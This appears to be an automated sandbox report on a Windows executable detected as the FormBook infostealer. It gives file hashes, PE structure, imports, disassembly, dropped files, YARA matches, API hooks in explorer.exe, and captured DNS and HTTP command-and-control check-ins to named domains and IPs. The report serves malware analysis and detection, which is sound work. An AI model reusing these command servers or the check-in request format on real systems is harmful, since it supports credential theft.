Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........xh....D...D...D.r.E...D...D...D{b.E...D{b.D...D{b.E...DRich...D................PE..L.....:c...............!..................... ....@..........................`............@..................................!.......@..0....................P..`.... ............................................... ...............................text...G........................... ..`.rdata..>.... ......................@..@.data...:....0......................@....rsrc...0....@......................@..@.reloc..`....P......................@..B........................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\hbmpmcwm.tfz

Download File

Process:	C:\Users\user\Desktop\primosdv3.1.1.0.exe
File Type:	data
Category:	dropped
Size (bytes):	189440
Entropy (8bit):	7.991176325141183
Encrypted:	true
SSDEEP:	3072:qMpf+ZMhpLYinMDJAaSh5xdYLLTyk6aOaRuFZq5W48u+lcOvK4OUK3aO85/V2CRT:RRcMHLHn4JAxdY3mOvCu+lcft33aO6/F
MD5:	B02C99ECFDB7D8793254BC8E9C003869
SHA1:	E38CA7FF9C88E36D19AA0198820B97F6A11DE201
SHA-256:	2F8EB57267950A4BC6E8DD8B2D7DEF8AFC40B8DB3C5EF49ADC68FB144F7E8E41
SHA-512:	D12CD9FBABDCC1A5C601D6C0326B34F65FFC63BE84CA94BC6DC70F0E70EC7C3B46122136D6F2A7E82BCB3E27D4BB89D9332DDD35026873FD4029D3405F73B09B
Malicious:	false
Reputation:	low
Preview:	....+J...j....\|(.0.u..J..R....).5........jz._3.UE.-Y............\|....r.7. ..FF{.......Q.?I~\.i=..b-,.G.=..q...dQc.0/.._..W...v}.b....'`.4t.. x...y......h.m'@.{..C`........E....H.%u.a`...2.......[...V.....q..<........N..5..r....l.2....L...s...Dg+J....3. ...RF0}R.....%=...).0....z...jz._3..E.-Y........../...'..y(...P4.2rgR...W.t[.C6W.L.xJx.....4.,J.~t..0/.._...m$.SoDS.....J.b......\.&L.r.9.....w=.n:h)y.-...........H.%..<`p..2.4h<....[....V.BAE'q..Q........Cy.5..r..,.l......L...s>..Dg+J....3. ...U>0}q.....%M...).5........jz._3.UE.-Y........../...'..y(...P4.2rgR...W.t[.C6W.L.xJx.....4.,J.~t..0/.._...m$.SoDS.....J.b......\.&L.r.9.....w=.n:h)y.-.......E....H.%.Ba`p..2.).<....[....V.BAE'q..Q........Cy.5..r..,.l......L...s>..Dg+J....3. ...U>0}q.....%M...).5........jz._3.UE.-Y........../...'..y(...P4.2rgR...W.t[.C6W.L.xJx.....4.,J.~t..0/.._...m$.SoDS.....J.b......\.&L.r.9.....w=.n:h)y.-.......E....H.%.Ba`p..2.).<....[....V.BAE'q..Q........

C:\Users\user\AppData\Local\Temp\hgmxh.brz

Download File

Process:	C:\Users\user\Desktop\primosdv3.1.1.0.exe
File Type:	data
Category:	dropped
Size (bytes):	4666
Entropy (8bit):	7.949680139202999
Encrypted:	false
SSDEEP:	96:EH5p6GkNpLZr6WP1zzXHvtORRyr5lau1y0OBifC8Ll0q6Nrj:EyZPhPV7HGyTf1ypUVSj
MD5:	73D355A9E88D7A82F69E612949EB4965
SHA1:	B6041F58669A65E43FBE8DCBA0DBD061E48812BC
SHA-256:	115814A83166723CE7080D92AF30822DBD7DC2D5D26EDEC9145B056B7226E166
SHA-512:	5498AD05A858051705E6E37A884F8897623BB2A415515C951E76D1EF12554994A6DE0CD17B045DD740D9D92055BA1B6A725129F36740261D9DE9EE9BB29577AF
Malicious:	false
Reputation:	low
Preview:	.S.M...#>.t.vY.._.Tn.6T.x=g.7..^...@E....D...vF!..il.(.,.U.P....uZ..zj.e4.H......\|.....B,...F....P......%..r"`..........^9.h.1..O..}.D.._.....{,.#.;G[..."aZ5..M.p.<..E.......>..7\|...%.....s.U.L.=.5........{...c`.Yp..p.^U...x....?..^.R..>.........,...%1w.\|8...3...#.....@..:...Z"..M;.24...:...v...J...../....VM.E..@G...@...(E5.(..6`.C\|.8=.g......N.Y..l.....yp...d..Mu.$83...;.-$B....u...nF....s..R.j.>\.54.O..C.e...$...x..32.~.@.Kh....X;.iC...#.M..J....M....n1.....?..^..`..M.dZ.!.;..l..Y.L.aWu.tX..#.....tEr.k.hA....5....wm ...]".e...]....).....=......C..6.r....5."..1.A.B....h\.I#h....N...aJQ#.).wh...~.3s0O...o.W...\....2....E../.Z.e,.Q......&r.!eW...B..X...Tqgu......M.Fy.%##.-OT...iM.l..y..._4..%f.8.a......G14N..=.,;.I.w.......x.m.^J.*..[C...D`.[...0.]l[:.......".1aS...{~f.a..cqW..&..liY...qSF0 ..o.T.......b.......F../E..e.).&.ffA.0.ZPP. M..hr.oG..;3^.[.]r...J.....7o.....=.......n....q].....a.vy...a.1K.[.5y..d;...K:...[n..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.134737003085009
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	primosdv3.1.1.0.exe
File size:	577991
MD5:	633bb3ab12d6fd7b6956aa3a93f55e9c
SHA1:	f4a72da6391fcc9c623ae26de27fc80f10cf9f2b
SHA256:	0b504e6f2a283de75673bbe913c5032b02cc6a92888f4dfab895f79104b11103
SHA512:	ebdfa42be8d8f1a64900ba48748c8f86d9b74defbf85b3dda94d1df4d7c695d81769e165252fc0cfb2b5ffe347d84eb2f4f74e8d3e3d3ed3fa6466426f4eec28
SSDEEP:	12288:zToPWBv/cpGrU3yJYqi+4mMz4pbIQ4+N54CHLottc:zTbBv5rUGdf4m/pMQ4m5nrJ
TLSH:	01C4DF037ACF81B1D2B1283A793592135939BE100FA089CBA7A4579DF9706D3D635FB2
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I..>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I..=>...I..=>.

File Icon


Icon Hash:	64e8acaca2d45869

Static PE Info

General

Entrypoint:	0x41f530
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp:	0x6220BF8D [Thu Mar 3 13:15:57 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	12e12319f1029ec4f8fcbed7e82df162

Entrypoint Preview

Instruction
call 00007FD184D0064Bh
jmp 00007FD184CFFF5Dh
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007FD184CF2DA7h
mov dword ptr [esi], 004356D0h
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 004356D8h
mov dword ptr [ecx], 004356D0h
ret
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 004356B8h
push eax
call 00007FD184D033EFh
test byte ptr [ebp+08h], 00000001h
pop ecx
je 00007FD184D000ECh
push 0000000Ch
push esi
call 00007FD184CFF6A9h
pop ecx
pop ecx
mov eax, esi
pop esi
pop ebp
retn 0004h
push ebp
mov ebp, esp
sub esp, 0Ch
lea ecx, dword ptr [ebp-0Ch]
call 00007FD184CF2D22h
push 0043BEF0h
lea eax, dword ptr [ebp-0Ch]
push eax
call 00007FD184D02EA9h
int3
push ebp
mov ebp, esp
sub esp, 0Ch
lea ecx, dword ptr [ebp-0Ch]
call 00007FD184D00068h
push 0043C0F4h
lea eax, dword ptr [ebp-0Ch]
push eax
call 00007FD184D02E8Ch
int3
jmp 00007FD184D04927h
int3
int3
int3
int3
push 00422900h
push dword ptr fs:[00000000h]

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x3d070	0x34	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x3d0a4	0x50	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x64000	0x1f293	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x84000	0x233c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x3b11c	0x54	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x355f8	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x33000	0x278	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x3c5ec	0x120	.rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x31bdc	0x31c00	False	0.5909380888819096	data	6.712962136932442	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x33000	0xaec0	0xb000	False	0.4579190340909091	data	5.261605615899847	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x3e000	0x24720	0x1000	False	0.451416015625	data	4.387459135575936	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.didat	0x63000	0x190	0x200	False	0.4453125	data	3.3327310103022305	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x64000	0x1f293	0x1f400	False	0.424109375	data	5.5156403191348256	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x84000	0x233c	0x2400	False	0.7749565972222222	data	6.623012966548067	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
PNG	0x645e4	0xb45	PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced	English	United States
PNG	0x6512c	0x15a9	PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced	English	United States
RT_ICON	0x666d8	0x6556	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States
RT_ICON	0x6cc30	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 67584	English	United States
RT_ICON	0x7d458	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States
RT_ICON	0x7fa00	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States
RT_ICON	0x80aa8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States
RT_DIALOG	0x80f10	0x286	data	English	United States
RT_DIALOG	0x81198	0x13a	data	English	United States
RT_DIALOG	0x812d4	0xec	data	English	United States
RT_DIALOG	0x813c0	0x12e	data	English	United States
RT_DIALOG	0x814f0	0x338	data	English	United States
RT_DIALOG	0x81828	0x252	data	English	United States
RT_STRING	0x81a7c	0x1e2	data	English	United States
RT_STRING	0x81c60	0x1cc	data	English	United States
RT_STRING	0x81e2c	0x1b8	data	English	United States
RT_STRING	0x81fe4	0x146	data	English	United States
RT_STRING	0x8212c	0x46c	data	English	United States
RT_STRING	0x82598	0x166	data	English	United States
RT_STRING	0x82700	0x152	data	English	United States
RT_STRING	0x82854	0x10a	data	English	United States
RT_STRING	0x82960	0xbc	data	English	United States
RT_STRING	0x82a1c	0xd6	data	English	United States
RT_GROUP_ICON	0x82af4	0x4c	data	English	United States
RT_MANIFEST	0x82b40	0x753	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States

Imports

DLL	Import
KERNEL32.dll	GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, LocalFree, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage
OLEAUT32.dll	SysAllocString, SysFreeString, VariantClear
gdiplus.dll	GdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.2.3103.224.212.22149708802031412 10/03/22-16:00:41.738205	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49708	80	192.168.2.3	103.224.212.221
192.168.2.3103.224.212.22149708802031449 10/03/22-16:00:41.738205	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49708	80	192.168.2.3	103.224.212.221
192.168.2.3103.224.212.22149708802031453 10/03/22-16:00:41.738205	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49708	80	192.168.2.3	103.224.212.221

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 3, 2022 16:00:18.956696987 CEST	49707	80	192.168.2.3	5.101.152.161
Oct 3, 2022 16:00:19.028978109 CEST	80	49707	5.101.152.161	192.168.2.3
Oct 3, 2022 16:00:19.029166937 CEST	49707	80	192.168.2.3	5.101.152.161
Oct 3, 2022 16:00:19.045396090 CEST	49707	80	192.168.2.3	5.101.152.161
Oct 3, 2022 16:00:19.116703987 CEST	80	49707	5.101.152.161	192.168.2.3
Oct 3, 2022 16:00:19.127684116 CEST	80	49707	5.101.152.161	192.168.2.3
Oct 3, 2022 16:00:19.127712011 CEST	80	49707	5.101.152.161	192.168.2.3
Oct 3, 2022 16:00:19.127924919 CEST	49707	80	192.168.2.3	5.101.152.161
Oct 3, 2022 16:00:19.127958059 CEST	49707	80	192.168.2.3	5.101.152.161
Oct 3, 2022 16:00:19.201196909 CEST	80	49707	5.101.152.161	192.168.2.3
Oct 3, 2022 16:00:41.572072029 CEST	49708	80	192.168.2.3	103.224.212.221
Oct 3, 2022 16:00:41.737982035 CEST	80	49708	103.224.212.221	192.168.2.3
Oct 3, 2022 16:00:41.738086939 CEST	49708	80	192.168.2.3	103.224.212.221
Oct 3, 2022 16:00:41.738204956 CEST	49708	80	192.168.2.3	103.224.212.221
Oct 3, 2022 16:00:41.939363003 CEST	80	49708	103.224.212.221	192.168.2.3
Oct 3, 2022 16:00:41.941509008 CEST	49708	80	192.168.2.3	103.224.212.221
Oct 3, 2022 16:00:41.941654921 CEST	49708	80	192.168.2.3	103.224.212.221
Oct 3, 2022 16:00:42.107552052 CEST	80	49708	103.224.212.221	192.168.2.3

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 3, 2022 16:00:18.870301008 CEST	57990	53	192.168.2.3	8.8.8.8
Oct 3, 2022 16:00:18.944986105 CEST	53	57990	8.8.8.8	192.168.2.3
Oct 3, 2022 16:00:41.398914099 CEST	52387	53	192.168.2.3	8.8.8.8
Oct 3, 2022 16:00:41.570863008 CEST	53	52387	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 3, 2022 16:00:18.870301008 CEST	192.168.2.3	8.8.8.8	0x1a5c	Standard query (0)	www.nordenergogrup.store	A (IP address)	IN (0x0001)	false
Oct 3, 2022 16:00:41.398914099 CEST	192.168.2.3	8.8.8.8	0x2286	Standard query (0)	www.sandstormcase.us	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 3, 2022 16:00:18.944986105 CEST	8.8.8.8	192.168.2.3	0x1a5c	No error (0)	www.nordenergogrup.store		5.101.152.161	A (IP address)	IN (0x0001)	false
Oct 3, 2022 16:00:41.570863008 CEST	8.8.8.8	192.168.2.3	0x2286	No error (0)	www.sandstormcase.us		103.224.212.221	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.nordenergogrup.store

www.sandstormcase.us

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49707	5.101.152.161	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 3, 2022 16:00:19.045396090 CEST	338	OUT	GET /sk29/?f2Jdmp=/dAaGq0HlK8GRVwC0eZiOsNSw3Abl/LxCMSzQhtOo+vkboQqmAD6TQGCAVscPIh/3NW5&j8Ot3=AVtD HTTP/1.1 Host: www.nordenergogrup.store Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 3, 2022 16:00:19.127684116 CEST	339	IN	HTTP/1.1 404 Not Found Server: nginx-reuseport/1.21.1 Date: Mon, 03 Oct 2022 14:00:19 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 284 Connection: close Vary: Accept-Encoding Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 31 20 28 55 6e 69 78 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6e 6f 72 64 65 6e 65 72 67 6f 67 72 75 70 2e 73 74 6f 72 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.51 (Unix) Server at www.nordenergogrup.store Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49708	103.224.212.221	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 3, 2022 16:00:41.738204956 CEST	340	OUT	GET /sk29/?f2Jdmp=M3Z0NOd5fAliwCg3EZwT2t6453H5ahVdrEePvIndisgPyIDGbv67zsai9msKV993IDUg&j8Ot3=AVtD HTTP/1.1 Host: www.sandstormcase.us Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 3, 2022 16:00:41.939363003 CEST	340	IN	HTTP/1.1 302 Found Date: Mon, 03 Oct 2022 14:00:41 GMT Server: Apache/2.4.38 (Debian) Set-Cookie: __tad=1664805641.1466436; expires=Thu, 30-Sep-2032 14:00:41 GMT; Max-Age=315360000 Location: http://ww38.sandstormcase.us/sk29/?f2Jdmp=M3Z0NOd5fAliwCg3EZwT2t6453H5ahVdrEePvIndisgPyIDGbv67zsai9msKV993IDUg&j8Ot3=AVtD Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Code Manipulations

User Modules

Hook Summary

Function Name	Hook Type	Active in Processes
PeekMessageA	INLINE	explorer.exe
PeekMessageW	INLINE	explorer.exe
GetMessageW	INLINE	explorer.exe
GetMessageA	INLINE	explorer.exe

Processes

Process: explorer.exe, Module: user32.dll

Function Name	Hook Type	New Data
PeekMessageA	INLINE	0x48 0x8B 0xB8 0x87 0x7E 0xE6
PeekMessageW	INLINE	0x48 0x8B 0xB8 0x8F 0xFE 0xE6
GetMessageW	INLINE	0x48 0x8B 0xB8 0x8F 0xFE 0xE6
GetMessageA	INLINE	0x48 0x8B 0xB8 0x87 0x7E 0xE6

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: primosdv3.1.1.0.exePID: 5604, Parent PID: 3452

General

Target ID:	0
Start time:	15:58:40
Start date:	03/10/2022
Path:	C:\Users\user\Desktop\primosdv3.1.1.0.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\primosdv3.1.1.0.exe
Imagebase:	0xc60000
File size:	577991 bytes
MD5 hash:	633BB3AB12D6FD7B6956AA3A93F55E9C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: bstkiooen.exePID: 6112, Parent PID: 5604

General

Target ID:	1
Start time:	15:58:42
Start date:	03/10/2022
Path:	C:\Users\user\AppData\Local\Temp\bstkiooen.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\bstkiooen.exe"
Imagebase:	0x1d0000
File size:	6144 bytes
MD5 hash:	A2AF309781DF2F75DC0B57AE63B0F3A9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.380585680.0000000001010000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.380585680.0000000001010000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.380585680.0000000001010000.00000004.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.380585680.0000000001010000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 24%, ReversingLabs
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: bstkiooen.exePID: 3092, Parent PID: 6112

General

Target ID:	2
Start time:	15:58:43
Start date:	03/10/2022
Path:	C:\Users\user\AppData\Local\Temp\bstkiooen.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\bstkiooen.exe"
Imagebase:	0x1d0000
File size:	6144 bytes
MD5 hash:	A2AF309781DF2F75DC0B57AE63B0F3A9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.367591783.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.367591783.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.367591783.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.367591783.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.367627039.0000000001010000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.367627039.0000000001010000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.367627039.0000000001010000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.367627039.0000000001010000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.367277832.0000000000401000.00000020.00000001.01000000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.367277832.0000000000401000.00000020.00000001.01000000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.367277832.0000000000401000.00000020.00000001.01000000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.367277832.0000000000401000.00000020.00000001.01000000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000000.256016836.0000000000401000.00000020.00000001.01000000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000000.256016836.0000000000401000.00000020.00000001.01000000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000000.256016836.0000000000401000.00000020.00000001.01000000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000000.256016836.0000000000401000.00000020.00000001.01000000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000000.254923934.0000000000401000.00000020.00000001.01000000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000000.254923934.0000000000401000.00000020.00000001.01000000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000000.254923934.0000000000401000.00000020.00000001.01000000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000000.254923934.0000000000401000.00000020.00000001.01000000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: explorer.exePID: 3452, Parent PID: 3092

General

Target ID:	3
Start time:	15:58:46
Start date:	03/10/2022
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff69fe90000
